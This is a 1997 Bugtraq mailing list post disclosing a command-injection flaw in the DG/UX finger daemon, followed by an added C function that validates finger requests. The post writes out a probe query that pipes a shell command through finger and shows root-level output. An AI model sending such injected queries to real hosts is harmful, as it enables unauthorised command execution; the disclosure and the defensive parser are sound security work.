Bugtraq mailing list archives
dgux in.fingerd vulnerability
From: gti () HOPI DTCC EDU (George Imburgia)
Date: Mon, 11 Aug 1997 12:32:38 -0400
Another old bug that won't die. The finger daemon that ships with dgux will allow a remote user to pipe commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

    finger /W@host

If it returns something like this, it may be vulnerable;

    Login name: /W In real life: ???

To see the uid in.fingerd is running as, try this;

    finger "|/bin/id@host"

Often, you will see something like this;

    uid=0(root) gid=0(root)

or;

    uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
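
Added example, not part of the original post and not DG/UX code: a request-line check a finger daemon could apply before any lookup, accepting only the RFC 1288 local form ([/W] [user]) so that a query like the one in the post is dropped instead of interpreted. The function name, the username allowlist and the refusal of @host forwarding are assumptions of this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Parse one finger request line of the RFC 1288 local form: [/W] [user] CRLF.
 * Returns 0 and fills *verbose and user on success; returns -1 (user left
 * empty) if the request must be dropped. Hypothetical helper, not vendor code.
 * Forwarding requests ("user@host") are refused outright. */
int parse_finger_query(const char *line, int *verbose, char *user, size_t ulen)
{
    size_t n = strcspn(line, "\r\n");   /* request ends at the first CR or LF */
    size_t i = 0, k = 0;

    *verbose = 0;
    if (ulen == 0)
        return -1;
    user[0] = '\0';

    /* Optional /W switch: a whole token, followed by a space or end of line.
     * It is consumed here and never treated as a login name. */
    if (n >= 2 && line[0] == '/' && line[1] == 'W' && (n == 2 || line[2] == ' ')) {
        *verbose = 1;
        i = 2;
    }
    while (i < n && line[i] == ' ')
        i++;

    /* Username: allowlist only. '|', ';', '`', '$', '/', '@', quotes, spaces
     * and any other byte outside [A-Za-z0-9._-] reject the whole request.
     * A leading '-' is refused so the name cannot be read as an option, and
     * an over-long name is rejected, never truncated. */
    for (; i < n; i++) {
        unsigned char c = (unsigned char)line[i];
        int ok = isalnum(c) || c == '.' || c == '_' || c == '-';
        if (!ok || k + 1 >= ulen || (k == 0 && c == '-')) {
            user[0] = '\0';
            return -1;
        }
        user[k++] = (char)c;
    }
    user[k] = '\0';
    return 0;
}
```

An empty user with return value 0 is the "list logged-in users" request; the validated name should still be passed to the lookup as data (for example a getpwnam() call), not through a shell.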